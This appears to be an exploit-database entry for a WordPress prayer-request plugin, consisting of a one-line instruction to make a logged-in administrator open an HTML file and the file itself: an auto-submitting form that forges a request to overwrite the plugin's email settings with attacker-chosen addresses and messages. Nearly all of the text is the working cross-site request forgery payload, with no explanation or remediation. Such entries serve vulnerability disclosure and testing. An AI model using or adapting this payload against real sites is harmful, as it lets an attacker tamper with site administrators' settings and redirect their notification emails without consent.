Share
## https://sploitus.com/exploit?id=WPEX-ID:1BFAB060-64D2-4C38-8BC8-A8F81C5A6E0D
Make a logged in admin open an HTML file containing:

```
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wpe_manage_email_settings" method="post" enctype="multipart/form-data">
        <input type="hidden" name="prayer_req_admin_email" value="csrf@csrf.com">
        <input type="hidden" name="wpe_email_cc" value="csrf@csrf.com">
        <input type="hidden" name="wpe_email_from" value="csrf">
        <input type="hidden" name="wpe_email_user" value="csrfm@csrf.com">
        <input type="hidden" name="wpe_email_req_subject" value="CSRF">
        <input type="hidden" name="wpe_email_req_messages" value="csrf">
        <input type="hidden" name="wpe_email_praise_subject" value="csrf">
        <input type="hidden" name="wpe_email_praise_messages" value="csrf">
        <input type="hidden" name="wpe_email_admin_subject" value="csrf">
        <input type="hidden" name="wpe_email_admin_messages" value="csrf">
        <input type="hidden" name="wpe_email_prayed_subject" value="csrf">
        <input type="hidden" name="wpe_email_prayed_messages" value="csrf">
        <input type="hidden" name="save_entity_data" value="Save Changes">
        <input type="hidden" name="operation" value="save">
        <input type="submit" value="Submit">
    </form>
</body>

```